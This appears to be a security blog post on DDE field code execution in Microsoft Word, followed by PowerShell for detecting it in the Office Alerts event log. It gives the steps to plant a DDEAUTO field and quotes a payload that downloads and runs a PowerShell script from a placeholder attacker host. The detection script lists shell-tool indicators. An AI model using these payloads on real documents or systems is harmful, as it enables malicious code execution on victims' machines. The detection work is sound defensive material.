Code Execution in MSWord

I read about a cool way to get code execution in MSWord from SensePost’s Saif El-Sherei and later read about a way to detect it from SecurityForRealPeople’s David Longenecker. Saif does a good job of explaining the steps in his post, but the basic setup is:

  1. Insert tab -> Quick Parts -> Field
  2. Choose =(Formula) and click OK
  3. Right-click on !Unexpected End of Formula and choose Toggle Field Codes
  4. Change the Field Code to contain:   {DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"}
  5. Save the document and then open it
  6. You will get two prompts to click through and then calc will open

The possibilities here are endless. Saif's proof-of-concept video in the post uses PowerShell to download an Empire launcher:

  { DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://evilserver.ninja/pp.ps1');powershell -e $e "}

I think that, depending on the access I had on the machine, I would change the syntax to be more stealthy so the popup doesn't raise any red flags with the user. Execution is lots of fun, but improving defenders and showing them how to find the cool techniques is really where the money is made. I drilled down on this particular code execution with the PowerShell command below. It will differ with environment and context:

  Get-EventLog -Log "OAlerts" -Newest 5 | where {$_.eventID -eq 300} | format-list -Property Message
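Building on that one-liner, here is an added example (my own, not from Saif's or David's posts) that pulls the same OAlerts event ID 300 entries and flags any whose prompt text mentions a command interpreter or a DDE field. The log name and event ID come from the command above; the indicator list, the function names and the sample message are assumptions constructed for illustration.

```powershell
# Added example: hunt the Office Alerts log for the prompts a DDE field leaves behind.
# Assumes the "OAlerts" log and event ID 300 from the post; everything else is constructed.

# Assumed indicators: strings a defender would not expect in a normal Office prompt.
$SuspiciousPatterns = @('cmd\.exe', 'powershell', 'mshta', 'DDEAUTO', '\bDDE\b')

# Check one alert message and return the matching indicators (empty if clean).
function Test-OfficeAlertMessage {
    param([Parameter(Mandatory)][string]$Message)
    $SuspiciousPatterns | Where-Object { $Message -match $_ }
}

# Pull the newest alerts, keep ID 300, and report only the ones that match.
# Get-EventLog exists in Windows PowerShell 5.1; on PowerShell 7 use
# Get-WinEvent -FilterHashtable @{LogName='OAlerts'; Id=300} instead.
function Find-SuspiciousOfficeAlerts {
    param(
        [int]$Newest = 200,
        [string]$ComputerName = $env:COMPUTERNAME
    )
    Get-EventLog -LogName 'OAlerts' -Newest $Newest -ComputerName $ComputerName |
        Where-Object { $_.EventID -eq 300 } |
        ForEach-Object {
            $hits = @(Test-OfficeAlertMessage -Message $_.Message)
            if ($hits.Count -gt 0) {
                [pscustomobject]@{
                    Time       = $_.TimeGenerated
                    Computer   = $_.MachineName
                    Indicators = ($hits -join ', ')
                    Message    = ($_.Message -replace '\s+', ' ')
                }
            }
        }
}

# Constructed sample prompt text (not a real captured event) to show the check offline.
$sample = 'The remote data is not accessible. Do you want to start the application c:\windows\system32\cmd.exe?'
Test-OfficeAlertMessage -Message $sample      # returns 'cmd\.exe'

# Live query; run on the workstation where the document was opened.
Find-SuspiciousOfficeAlerts -Newest 500 | Format-Table -AutoSize -Wrap
```

Office writes to OAlerts only after the user has seen the prompt, so this finds documents that were opened, not ones sitting unopened in a mailbox.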